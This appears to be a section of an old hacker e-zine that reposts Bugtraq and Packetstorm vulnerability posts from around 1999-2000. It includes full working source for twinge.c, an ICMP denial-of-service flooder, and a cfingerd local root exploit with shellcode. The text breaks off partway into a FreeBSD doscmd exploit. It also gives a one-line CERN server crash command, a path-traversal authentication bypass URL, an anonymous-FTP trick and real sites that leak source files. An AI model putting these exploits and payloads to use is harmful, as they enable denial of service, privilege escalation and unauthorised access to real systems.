160.0 Mozilla curiosity ~~~~~~~~~~~~~~~~~ Intersting msg found on vuln-dev list... From: Roy Wilson <emperor@squonk.net> To: <VULN-DEV@SECURITYFOCUS.COM> Sent: Wednesday, December 01, 1999 8:02 AM Subject: Idiocy "exploit" I don't know if this is really suitable for this list, it's more of a "pay attention to what you're doing, dummy" "exploit. I was cruising a .GOV site the other day with GetRight in Browse mode (an enhanced FTP client, it appears), while walking a client through the directories he needed to traverse to find the file he wanted (a database). We were getting different file counts - his Netscape would show 7 files, GR on my end would show 28. After about two hours of messing around trying to find out what was going on, we finally found it. He had Netscape set to the default "Mozilla@" for anon login password. If I set GR to any email address other than the one I was using the first time around, I only saw the seven files as well. The other 21 files were the raw data the cgi script used to build sorted db's for HTML display. The email address that showed all data? fraud@irs.gov Being the curious person that I am, I started hitting state level sites as well as federal. About a third of them showed more files with the fraud@ than with mozilla@. -=- Follow up info: Some FTP-servers can be configured to let anonymous FTP-users that supply a non-RFC822 compliant e-mail address as their password access a restricted FTP-area. Roy: Try whatever@ and Mozilla@whatever and see what happens. ... @HWA 161.0 Any user can make hard links in Unix ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From vuln-dev list From: Benjamin Elijah Griffin <bgriffin@CDDB.COM> To: <VULN-DEV@SECURITYFOCUS.COM> Sent: Tuesday, December 21, 1999 9:36 PM Subject: any user can make hard links in Unix I've talked with some people about it and found only one person who knew about this and no one who could offer a good reason for it. So perhaps awareness should be increased and OSs patched. I've tested this out on SunOS 4.1; RedHat 6.0 (Linux 2.2.5-15); BSDI BSD/OS 4.0; and NetBSD 1.4.1. Probably lots more do it. Basically any user can make a hard link to any file IF A) the user knows the file exists B) has enough access to cd into the directory it is in C) has write access to any directory on the same volume What does this gain you? 1) If the user has read access to the writable directory, s/he can now stat the inode even if the original location did not offer read access. 2) The user can change the ctime of the inode (fun with tripwire). 3) Some suid programs that just checked for sym-links can perhaps be duped into opening or writing to files they shouldn't. 4) Social hacks involving 'chown -R' or the like. 5) Screw with the quota of other users and other ways to make it hard to delete files that should be deleted (eg large logs in /var) Possibly other things. Thanks to Alexis Rosen for his input on this. Benjamin @HWA 162.0 Crash windows boxes on local net (twinge.c) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ BUGTRAQ Post From: <sinkhole@NILL.NET> To: <BUGTRAQ@SECURITYFOCUS.COM> Sent: Thursday, February 10, 2000 1:36 PM Subject: crash windows boxes on your local network (twinge.c) Hi Everyone. I've had this sitting on my hard drive for awhile but it still works, so I figured it was time to see this get fixed. Crashes almost any windows box on your local network. Compiles on Linux. If you can't figure it out you shouldn't be using it anyways. =) -sinkhole -- BEGIN twinge.c -- /* twinge.c - by sinkhole@dos.org [6/99] this cycle through all the possible icmp types and subtypes and send to target host, 1 cycle == 1 run thru all of em Crashes almost all Windows boxes over a LAN. DISCLAIMER: This is a PoC (Proof Of Concept) program for educational purposes only. Using this program on public networks where other people are affected by your actions is _HIGHLY ILLEGAL_ and is not what this is made for. for without help from ryan this wouldnt have been coded. =) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> long counter=1; void usage(const char *progname, const char *user) { fprintf(stderr, "twinge.c by sinkhole@dos.org - licensed for use by %s\n", user); fprintf(stderr, "This is a PoC (Proof of Concept) program for educational uses.\n"); fprintf(stderr, "usage: %s <dest> <cycles [0 == continuous]>\n", progname); } int resolver(const char *name, unsigned int port, struct sockaddr_in *addr ) { struct hostent *host; memset(addr,0,sizeof(struct sockaddr_in)); addr->sin_family = AF_INET; addr->sin_addr.s_addr = inet_addr(name); if (addr->sin_addr.s_addr == -1) { if (( host = gethostbyname(name) ) == NULL ) { fprintf(stderr,"ERROR: Unable to resolve host %s\n",name); return(-1); } addr->sin_family = host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); } addr->sin_port = htons(port); return(0); } unsigned short in_cksum(addr, len) /* normal checksum */ u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } int send_packet(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr, long seq, int ty, int code) { unsigned char *packet; struct iphdr *ip; struct icmphdr *icmp; int rc; #ifdef DEBUG printf("type: %d code: %d\n", ty, code); #endif srandom((getpid()+time(NULL)+seq)); packet = (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet + sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip->ihl = 5; ip->version = 4; ip->id = htons(random()*(seq*getpid()*3)); ip->frag_off = 0; ip->tot_len = strlen(packet); ip->ttl = 255; ip->protocol = IPPROTO_ICMP; ip->saddr = random()+ty+getpid(); ip->daddr = dest_addr->sin_addr.s_addr; ip->check = in_cksum(ip, sizeof(struct iphdr)); icmp->type = ty; icmp->code = code; /* 3(unreach): cycle 0-9 5(redirect): cycle 0-3 11(time_exceed): cycle 0-1 */ icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1); if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { perror("sendto"); exit(0); } free(packet); return(0); } int main(int argc, char *argv[]) { struct sockaddr_in dest_addr; unsigned int i, x, s, sock; unsigned long src_addr; char owner[10]; strcpy(owner, "t"); strcat(owner, "h"); strcat(owner, "e"); strcat(owner, " "); strcat(owner, "p"); strcat(owner, "u"); strcat(owner, "b"); strcat(owner, "l"); strcat(owner, "i"); strcat(owner, "c"); if(argc < 2) { usage(argv[0], owner); exit(0); } if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf(stderr,"ERROR: Opening raw socket. (need UID 0)\n"); return(-1); } if (resolver(argv[1],0,&dest_addr) == -1) { fprintf(stderr, "Cannot resolve destination\n"); exit(0); } src_addr = dest_addr.sin_addr.s_addr; for (s = 0;s <= atoi(argv[2]) || (atoi(argv[2]) == 0);s++) { for (i = 0;i < 18;i++) { switch(i) { case 3: /* cycle 0-9 */ for (x=0; x<=9; ++x) send_packet(sock, src_addr, &dest_addr, counter, i, x); break; case 5: /* cycle 0-3 */ for (x=0; x<=3; ++x) send_packet(sock, src_addr, &dest_addr, counter, i, x); break; case 11: /* cycle 0-1 */ for(x=0;x<=1;++x) send_packet(sock, src_addr, &dest_addr, counter, i, x); break; default: /* just use 0 =) */ send_packet(sock, src_addr, &dest_addr, counter, i, 0); } ++counter; } } } -- END twinge.c -- @HWA 163.0 SpiderMap 0.1 Released ~~~~~~~~~~~~~~~~~~~~~~ BUGTRAQ Announcement I have been sitting on this for almost six months and figured it may interest some of the users here... To quote the README: Spidermap is a collection of perl scripts which enable you to launch precisely tuned network scans. The goal of this project is to create an integrated suite of tools for low-impact network reconnaisance with features including custom packet rates and scan types for each network with increased efficiency by mapping multiple networks in parallel. The target users are system administrators and network security professionals seeking a non-destructive way to inventory network services and do so in a resaonable amount of time. You can find the latest code and more information at http://www.secureaustin.com/spidermap [ spidermap readme ] (Updated February 10, 2000) [1] (Overview of SpiderMap) Spidermap is a collection of perl scripts which enable you to launch precisely tuned network scans. The goal of this project is to create an integrated suite of tools for low-impact network reconnaisance with features including custom packet rates and scan types for each network with increased efficiency by mapping multiple networks in paralell. The target users are system administrators and network security professionals seeking a non-destructive way to inventory network services and do so in a resaonable amount of time. [2] (Components) There are 3 major components of the spidermap toolkit: < breakdown This script takes a list of ip addresses in as input and then prompts the user for specific information about each network. The output is fed into the actual scanning engine. This allows scans to be predefined for specific tasks. To see the usage, execute 'perl breakdown -h'. < spidermap The core of the toolkit, this script reads in a configuration file generated by breakdown, performs the scans, and dumps the raw output to a file for use by the createdb script. Check out the various options with 'perl spidermap -h'. < nlogdb The nlogdb script reads in the raw nmap output from spidermap and turns it into a flat-file database in the same format Nlog. This flat-file pipe delimited database can be used for whatever purpose you can think of, whether scheduled network analysis or the input for another set of tools. [3] (Examples) To do anything you must create a list of target addresses. This can be accomplished by any of a number of ways: < Nmap ping scan of your target network. nmap -sP -PB1027 -g80 192.168.10.0/24 -m - | grep "Status: Up" | awk '{print $2}' > target.list < DNS zone transfer: host -l example.com | grep "has address" | awk '{ print $4 }' | sort -u > target.list You then feed this list of addresses to the breakdown script, specify any defaults or the -auto option on the command line for non-interactive configuration. < Interactive Configuration perl breakdown -i target.list -o target.conf -c C < Automatic Configuration perl breakdown -i target.list -o target.conf -c C -p 21,22,23,25,53,79,80,110-113,139,443 -s S -auto Now either save this configuration file for future use or start the scan now: perl spidermap -i target.conf -o target.log -sp 20,53,80,443 This should calculate the number of packets per minute sent out based on your settings and ask you to hit enter to continue. I plan on adding a non-interactive option later on. The script will start launching multiple nmap processes in parallel, giving you some feedback on the console while it scans. After the scan completes, you need to do something with the output. The createdb tool takes this output and puts it into a flat-file pipe delimited text database. perl nlogdb target.log target.db [4] (ToDo) These scripts are still very primitive and I am sure they still have a few major bugs in them. Perl and multiple nmap processes is a very kludgey way or accomplishing the project goal, but until I have enough time or enough people express interest it makes a usuable prototype. Below are the known issues: The spidermap script launches all the processes at once instead of spacing them out over the one minute interval. The kind of defeats the stealth option since the fast flood of packets makes it stand out. The exception being if you used decoys and set the packet rate to 1 for each network. Find a better method of parallel scanning. I dont have the time to rewrite nmap... BTW: Yes I know there is some "thought charting software" out there by the same name, I really don't care ;) -HD (hdm@secureaustin.com / http://www.secureaustin.com) @HWA 164.0 Windows Api SHGetPathFromIDList Buffer Overflow ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Windows Api SHGetPathFromIDList Buffer Overflow To all those people who sent email to us asking for more information about the SHGetPathFromIDList Windows Api overflow. Here is a more specific description about the problem. All Structure lengths, or Length of string, can be a modified or altered and cause whatever handles the shortcuts to crash. SHGetPathFromIDList Converts an item identifier list to a file system path. BOOL SHGetPathFromIDList( LPCITEMIDLIST pidl, LPSTR pszPath ); Parameters pidl Address of an item identifier list that specifies a file or directory location relative to the root of the namespace (the desktop). pszPath Address of a buffer to receive the file system path. This buffer must be at least MAX_PATH characters in size. Return Values Returns TRUE if successful, or FALSE otherwise. Disassembly of a hypothetical shortcut file Offset Bytes Contents Header 0000 4C 00 00 00 =91L=92 Magic value 0004 01 04 02 00 GUID of shortcut files 00 00 00 00 C0 00 00 00 00 00 00 46 0014 3F 00 00 00 Flags Has item id list Target is a file Has description string Has relative pathname Has a working directory Has a custom icon 0018 20 00 00 00 File attibutes Archive 001C C0 0E 82 D5 Time 1 C1 20 BE 01 0024 00 08 BF 46 Time 2 D5 20 BE 01 002C 00 47 AA EC Time 3 EC 15 BE 01 0034 A0 86 00 00 File length is 34464 bytes. 86A0h 0038 05 00 00 00 Icon number 5 003C 01 00 00 00 Normal window 0040 46 06 00 00 Ctrl-Alt-F hotkey 0044 00 00 00 00 Always zero, unknown/reserved 0048 00 00 00 00 Always zero, unknown/reserved Item Id List 004C 2A 00 Size of item id list First item 004E 28 00 Length of first item 0050 32 00 ??? 0052 A0 86 00 00 File length 0056 76 25 71 3E ??? 005A 20 00 File attributes? 005C 62 65 73 74 5F 37 =93best_773.mid=94 Long name 37 33 2E 6D 69 64 00 Null terminator 0069 42 45 53 54 5F 37 =93BEST_773.MID=94 Short name 37 33 2E 4D 49 44 00 Null terminator Last item 0076 00 00 Zero length value File location info 0078 74 00 00 00 Structure length 007C 1C 00 00 00 Offset past last item in structure 0080 03 00 00 00 Flags Local volume Network volume 0084 1C 00 00 00 Offset of local volume table 0088 34 00 00 00 Offset of local path string 008C 40 00 00 00 Offset of network volume table 0090 5F 00 00 00 Offset of final path string Local volume table 0094 18 00 00 00 Length of local volume table 0098 03 00 00 00 Fixed disk 009C D0 07 33 3A Volume serial number 3A33-07D0 00A0 10 00 00 00 Offset to volume label 00A4 44 52 49 56 45 20 =93DRIVE C=94,0 43 00 00AC 43 3A 5C 57 49 4E =93C:\ WINDOWS\=94 local path string 44 4F 57 53 5C 00 Network volume table 00B8 1F 00 00 00 Length of network volume table 00BC 02 00 00 00 ??? 00C0 14 00 00 00 Offset of share name 00C4 00 00 00 00 ??? 00C8 00 00 02 00 ??? 00CC 5C 5C 4A 45 53 53 =93\\ JESSE\ WD=94,0 Share name 45 5C 57 44 00 00D7 44 65 73 6B 74 6F =93Desktop\ best_773.mid=94,0 70 5C 62 65 73 74 Final path name 5F 37 37 33 2E 6D 69 64 00 Description string 00EC 12 00 Length of string 00EE 42 65 73 74 20 37 =93Best 773 midi file=94 37 33 20 6D 69 64 69 20 66 69 6C 65 Relative path 0100 0E 00 Length of string 0102 2E 5C 62 65 73 74 =93.\ best_773.mid=94 5F 37 37 33 2E 6D 69 64 Working directory 0114 12 00 Length of string 0116 43 3A 5C 57 49 4E =93C:\ WINDOWS\ Desktop=94 44 4F 57 53 5C 44 65 73 6B 74 6F 70 Command line arguments 0128 06 00 012A 2F 63 6C 6F 73 65 =93/close=94 Icon file 0130 16 00 Length of string 0132 43 3A 5C 57 49 4E =93C:\ WINDOWS\ Mplayer.exe=94 44 4F 57 53 5C 4D 70 6C 61 79 65 72 2E 65 78 65 Ending stuff 0148 00 00 00 00 Length 0 - no more stuff The target is located at: C:\ WINDOWS\ Desktop\ best_773.mid The windows directory is shared as: \\ JESSE\ WD Note: This overflow does not work under win2k u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h http://www.ussrback.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com> iQA/AwUBOJsyuNybEYfHhkiVEQJHNACg58a5nakFaSPNoFVOLZ0WMPMHVYcAn0TT 2HEPwsUBJTmD4Fzah4yZ+Zjh =3DBFth -----END PGP SIGNATURE----- @HWA 165.0 Anywhere Mail Server Ver.3.1.3 Remote DoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Hello, I've reported DoS probrems on Internet Anywhere Mail Server Ver.3.1.3 to support@tnsoft.com on 3rd Dec,99. They started to develop the fix. But they said "we'll release the fix in couple of weeks" three times. I've discussed with Jeff Moll(President of True North Software, Inc.) and he allowed me to post these vulnerabilities. 1. RETR DoS in POP service +OK POP3 Welcome to somewhere.domain using the Internet Anywhere Mail Server Version: 3.1.3. Build: 1065 by True North Software, Inc. USER yellow +OK valid PASS pikapika +OK Authorized RETR 111111111111111111111111 That's all. The Server could be dead at a little bit after atoi(). They should check return value of atoi(). 2. multiple connections to port 25 DoS This is simple game, too. Too much connect()s about 3000, then you will see connection refused. After that, too much connect()s again about 800, then you can't connect anymore. It depends on memory size(I tested on 128MB RAM,total 256MB). They should check connection status. Moderator of BUGTRAQ-JP <Nobuo Miwa> n-miwa@lac.co.jp ( @ @ ) http://www.lac.co.jp/security/ -------------------------------o00o--(. .)--o00o------------------------- @HWA 166.0 .ASP error shows full source code to caller ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ASP = Active Server Pages (Microsoft) Packetstorm: Forwarded with permission of the author. Please direct all replies to jwalsh@jwsg.com. Ben Greenbaum Director of Site Content Security Focus http://www.securityfocus.com ---------- Forwarded message ---------- Description: ============ Active server pages (ASP) with runtime errors expose a security hole that publishes the full source code name to the caller. If these scripts are published on the internet before they are debugged by the programmer, the major search engines index them. These indexed ASP pages can be then located with a simple search. The search results publish the full path and file name for the ASP scripts. This URL can be viewed in a browser and may reveal full source code with details of business logic, database location and structure. Procedure: ========== - In the Altavisa search engine execute a search for +"Microsoft VBScript runtime error" +".inc, " - Look for search results that include the full path and filename for an include (.inc) file. - Append the include filename to the host name and call this up in a web browser. Example: www.rodney.com/stationery/browser.inc Examples: ========= http://shopping.altavista.com/inc/lib/prep.lib Exposes database connections and properties, resource locations, cookie logic, server IP addresses, business logic http://www.justshop.com/SFLib/ship.inc Exposes database properties, business logic http://www.bbclub.com:8013/includes/general.inc Exposes cobranding business logic http://www.salest.com/corporate/admin/include/jobs.inc Exposes datafile locations and structure http://www.bjsbabes.com/SFLib/design.inc Exposes source code for StoreFront 2000 including database structure http://www.ffg.com/scripts/IsSearchEngine.inc Exposes search engine log http://www.wcastl.com/include/functions.inc Exposes members email addresses and private comments file http://www.wcastl.com/flat/comments.txt http://www.traveler.net/two/cookies.inc Exposes cookie logic Resolution: =========== - Search engines should not index pages that have ASP runtime errors. - Programmers should fully debug their ASP scripts before publishing them on the web - Security administrators need to secure the ASP include files so that external users can not view them. =========================== Jerry Walsh JW's Software Gems Email jwalsh@jwsg.com Phone (949) 855-0233 Website http://www.jwsg.com =========================== @HWA 167.0 Bypassing authentication on Axis 700 Network Scanner ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Infosec Security Vulnerability Report No: Infosec.20000207.axis700.a ===================================== Vulnerability Summary --------------------- Problem: Bypassing authentication on Axis 700 Network Scanner; By modifying an URL, outsiders can access administrator URLs without entering username and password. Threat: Unauthorized access. Platform: Axis 700 Network Scanner Server (Software Version 1.12) Solution: Non? Se below. Vulnerability Description ------------------------- User pages are located under http://server/user/. The URL to the configuration page is: http://server/admin/this_axis700/this_axis700.shtml This page is password protected. The actual configuration takes place on the pages linked from this page. By changing the URL to: http://server/user/../admin/this_axis700/this_axis700.shtml gives an outsider access to the configuration page without entering username and password. The server seems to check access permissions before URL conversion. The server also decodes %1u to %2e (not a vulnerability). Solution -------- <<Quote_from_Axis_Support Hi,, You will find the latest version on http://www.axis.se/techsup Best Regards XXXXXX XXXXXXX Quote_from_Axis_Support Nothing says that version 1.14 will fix this vulnerability. Other information ----------------- Infosec recommends everyone to try to access their authorized pages with URLs as: http://server/NonPrivPage/../PrivPage/ Infosec thanks weld at l0pht for the inspiration (http://www.l0pht.com/advisories/showcode.txt) //Ian Vitek ian.vitek@infosec.se ------------------------------- Infosec is a Swedish based tigerteam that have worked with computer-related security since 1982 and done penetration tests and technical revisions since 1996. Infosec is now searching for co-workers. Call Blume on +46-8-6621070 for more information. @HWA 168.0 Novell Bordermanager 3.0 through 3.5 is vulnerable to a slow DoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: The issue also affects BorderManager 3.0 (sp2) running on NetWare 4.11 sp6a. I was able to replicate the memory allocation error but have not had any luck with obtaining the high CPU utilisation. Again, csatpxy.nlm is loaded by default on this system and unloading it stopped the memory allocation errors. matthew -----Original Message----- From: Chicken Man [mailto:chicknmon@HOTMAIL.COM] Sent: Wednesday, 9 February 2000 11:59 Subject: Novell BorderManager 3.5 Remote Slow Death On a (default) installation of BorderManager 3.5 sp1, spc02 running on NetWare 5.0 sp3a with nici 1.3.1, telnet to port 2000 on the firewall (on either the public or private interfaces) and hit enter a few times. Utilization will jump (to 67% on our systems), and the console will immediately report an error similar to the following: 1-27-2000 9:34:47 am: SERVER-5.0-830 [nmID=2000A] Short Term Memory Allocator is out of Memory. 1 attempts to get more memory failed. The telnet session will not disconnect, unless you manually close the connection. Over the course of two days (every few minutes or so, YMMV) the error will repeat, with the number of attempts steadily increasing (by several million each time). Eventually (again, for us it was two days, YMMV) the firewall will deny all requests, and eventually crash completely. Further symptoms: Using tcpcon you can see something listening on port 2000. If the telnet session has been closed from the remote end, tcpcon reports that the previous session is in a "closewait" state. It may be possible to do more bad things since this entry never clears automatically (i.e. use up the rest of system resources by opening and closing connections to this port). It can be cleared using tcpcon. The misbehaving NLM is CSATPXY.NLM. It is the CS Audit Trail Proxy, which is apparently loaded by default on a BorderManager 3.5 install. From what various people tell me, it could also be installed on non-BorderManger Novell servers (though probably not by default) which means this vulnerability may extend beyond BorderManager 3.5. Novell was contacted regarding this and the answer was "unload the NLM". Unloading the NLM does stop the slow death. Rebooting will reload the NLM so it must be taken out of whatever loads it on boot, of course. <RANT> Why is the port even accessable from the outside (or the inside for that matter)? The default BorderManager packet filtering rules indictate that pretty much everything is being passed. Why is the NLM loaded by default? Tcpcon shows various other services running that shouldn't be either (chargen, echo, etc). Why? What other vulnerabilities am I missing? </RANT> enjoy, ChicknMon __________________________________________________ ____ Get Your Private, Free Email at http://www.hotmail.com @HWA 169.0 CERN 3.0A Heap overflow advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: #$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$# $% CERN 3.0A Heap overflow advisory %$ #$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$# $% By Scrippie %$ #$ Phreak.nl $# $%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$ #$ Love To: Maja, Dopey, Hester $# $%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$%$#$ there is a heap overflow that wastes memory space in the CERN/3.0A webserver. Offending source code file is: Daemon/Implememtation/HTScript.c Offending function is: PUBLIC int HTCallScript ARGS1(HTRequest *, req) Offending Code snippet: else { /* Try replacing unknown suffix with .pp */ char *test = (char*)malloc(strlen(HTReqScript) + 4); char *s; CTRACE(stderr, "Trying...... to find executable by appending .pp\n"); strcpy(test, HTReqScript); s = strrchr(test, '.'); strcat(test, ".pp"); /* Try appending .pp */ CTRACE(stderr, "Trying...... \"%s\"\n", test); if (-1==access(test, X_OK)) { /* Then try replacing suffix with .pp */ if (s) { *s = 0; strcat(s, ".pp"); CTRACE(stderr, "Bad luck.... now trying \"%s\"\n", test); if (-1==access(test, X_OK)) { /* INVALID */ if (!(msg = (char*)malloc(3*strlen(test) + 100))) outofmem(__FILE__, "HTCallScript"); sprintf(msg, "Bad script request -- none of '%s' and '%s.pp' is executable", HTReqScript, test ); free(test); So we see that test is malloced to hold HTReqScript + ".pp\0" after which HTReqScript is copied to test, the dot is located and .pp is appended. We note that strcat() does not just append ".pp" to the string, but rather ".pp\0". Now, if the HTReqScript did contain a suffix CERN will go and use the char pointer s to overwrite the suffix of HtReqScript. If the HtRequest with the new ".pp" suffix cannot be found we print an error message. It seems CERN allocates 3*strlen(test) + 100 bytes for our error string... Probabely some 100 for our static string and the rest for HtReqScript and test. Sadly, the strcat on test will have limited the lenght of the test string, but NOT of HtReqScript, so making sure we have a lot of characters after our seperating dot overflows the heap. Consider a HtReqScript of 1 A a dot and 50000 A's - now we get something like: HtReqScript - somewhere around 50000 bytes (50003) Test - the same as HtReqScript + 4 (50007) After putting ".pp\0" into place however in our test array we get: strlen(test) - 1 A, 1 dot, pp - hmmm, 3 bytes Now our msg will be: 3*3+100=109 - by far enough to hold test, but by far NOT enough to hold HtReqScript. Close to 50000 bytes of the heap will be ruined! It's unlikely that this flaw is exploitable, since there is nothing on the heap after the malloced msg, but I'd sure like to hear any ideas. /* Scrip kids DoS attack section */ iLikeDossing# lynx http://www.lart.org/cgi-bin/A.`perl -e 'print"A" x 50000'` Repeat several times and see memory usage jump to remarkable heights :) /* End of script kiddies section */ A lot of thanks go to dvorak for pointing out to me that most webservers seem to suffer some sort of flaw in their script parsing routines and for telling me to take a look at HTScript.c A quick patch: --- HTScript.back Wed Jan 26 22:18:44 2000 +++ HTScript.c Wed Jan 26 22:19:52 2000 @@ -894,7 +894,7 @@ strcat(s, ".pp"); CTRACE(stderr, "Bad luck.... now trying \"%s\"\n", test); if (-1==access(test, X_OK)) { /* INVALID */ - if (!(msg = (char*)malloc(3*strlen(test) + 100))) + if (!(msg = (char*)malloc(strlen(HTReqScript)+strlen(test) + 100))) outofmem(__FILE__, "HTCallScript"); sprintf(msg, (Isn't a unified diff a beautifull thing :-) A big hooray to: #phreak.nl A lots of love to: Dopey, Maja, Hester Thanks to: dvorak Cheers, Scrippie - ronald@grafix.nl @HWA 170.0 Cfingerd 1.3.3 (*BSD) remote root buffer overflow exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: /* * babcia padlina ltd. <babunia@freebsd.lublin.pl> * cfingerd 1.3.3 (*bsd) root sploit * * usage: adjust ptr until cfingerd will segfault with some random data on * output, now adjust ret. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #define BUFFER_SIZE 80 #define ADDRS 190 #define PTR 0xbfbfd750 #define RET 0xbfbfd7d2 #define NOP 0x90 #define FILE1 "user.inf" #define FILE2 "hack" #define FILE3 "set.c" #define SHELL "/tmp/sh" #define FINGER 79 #define MAXLINE 1024 #define LOCALHOST 0x7f000001 #define GREEN "\E[1;32m" #define RED "\E[1;31m" #define NORM "\E[1;39m" #define UNBOLD "\E[m" void sh(sockfd) int sockfd; { char buf[MAXLINE]; int c; fd_set rf, drugi; FD_ZERO(&rf); FD_SET(0, &rf); FD_SET(sockfd, &rf); while (1) { bzero(buf, MAXLINE); memcpy (&drugi, &rf, sizeof(rf)); select(sockfd+1, &drugi, NULL, NULL, NULL); if (FD_ISSET(0, &drugi)) { c = read(0, buf, MAXLINE); send(sockfd, buf, c, 0x4); } if (FD_ISSET(sockfd, &drugi)) { c = read(sockfd, buf, MAXLINE); if (c<0) return; write(1,buf,c); } } } int connectto(void) { int sockfd; char sendbuf[MAXLINE]; struct sockaddr_in cli; bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_addr.s_addr=htonl(LOCALHOST); cli.sin_port = htons(FINGER); if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); return -1; } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) { perror("connect"); return -1; } sprintf(sendbuf, "%.1023s\n", getenv("LOGNAME")); write(sockfd, sendbuf, strlen(sendbuf)); sleep(1); fflush(stdout); fflush(stderr); sh(sockfd); return; } int main(argc, argv) int argc; char **argv; { char *buf1 = NULL, *buf2 = NULL, *p = NULL; u_long *addr_ptr = NULL; int noplen, i, bufsize = BUFFER_SIZE, addrs = ADDRS; int retofs = 0, ptrofs = 0; long ret, ptr; FILE *phile; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff"SHELL"\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; fprintf(stderr, "\n"GREEN"babcia padlina ltd. cfingerd local root exploit"NORM UNBOLD"\n\n"); if(argc > 5) { bufsize = atoi(argv[1]); addrs = atoi(argv[2]); ptrofs = atoi(argv[3]); retofs = atoi(argv[4]); } if(!(buf1 = malloc(bufsize+1))) { perror("malloc()"); return -1; } if(!(buf2 = malloc(addrs+1))) { perror("malloc()"); return -1; } ret = RET + ptrofs; ptr = PTR + ptrofs; noplen = bufsize - strlen(execshell); memset(buf1, NOP, noplen); strcat(buf1, execshell); p = buf2; addr_ptr = (unsigned long *)p; for(i = 0; i < (addrs / 4) /2; i++) *addr_ptr++ = ptr; for(i = 0; i < (addrs / 4) /2; i++) *addr_ptr++ = ret; p = (char *)addr_ptr; *p = '\0'; if ((phile = fopen(FILE1, "w")) == NULL) { perror("fopen()"); return -1; } fprintf(stderr, GREEN "RET:" RED "0x%x\n" GREEN "PTR:" RED "0x%x%\n\n" GREEN "setting up..." NORM UNBOLD "\n", ret, ptr); fprintf(phile, "#Changing user database information for %s.\n" "Shell: %s\n" "Full Name: %s\n" "Office Location: %s\n" "Office Phone: \n" "Home Phone: \n" "Other information: \n", getenv("LOGNAME"), getenv("SHELL"), buf2, buf1); fclose(phile); if ((phile = fopen(FILE2, "w")) == NULL) { perror("fopen()"); return -1; } fprintf(phile, "cat user.inf>\"$1\"\n"); fprintf(phile, "touch -t 2510711313 \"$1\"\n"); fclose(phile); if ((phile = fopen(FILE3, "w")) == NULL) { perror("fopen()"); return -1; } // buffer is too small to execute seteuid/setegid there, so we have // to do this here. fprintf(phile, "main() { seteuid(getuid()); setegid(getgid()); system(\"id\"); execl(\"/bin/sh\", \"sh\", 0); }"); fclose(phile); system("/usr/bin/cc -o " SHELL " " FILE3); unlink(FILE3); system("EDITOR=./" FILE2 ";export EDITOR;chmod +x " FILE2 ";chfn > /dev/null 2>&1"); unlink(FILE1); unlink(FILE2); if (connectto() < 0) return -1; unlink(SHELL); return 0; } @HWA 171.0 FreeBSD 3.4-STABLE /usr/bin/doscmd local exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: /* * * (c) 1999 babcia padlina ltd. <babunia@freebsd.lublin.pl> * FreeBSD 3.4-STABLE /usr/bin/doscmd exploit. * */ #include <stdio.h> #include <sys/param.h> #include <sys/stat.h> #include <string.h> #define NOP 0x90 #define BUFSIZE 1000 #define ADDRS 1200 long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(argc, argv) int argc; char **argv; { char *execshell = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" 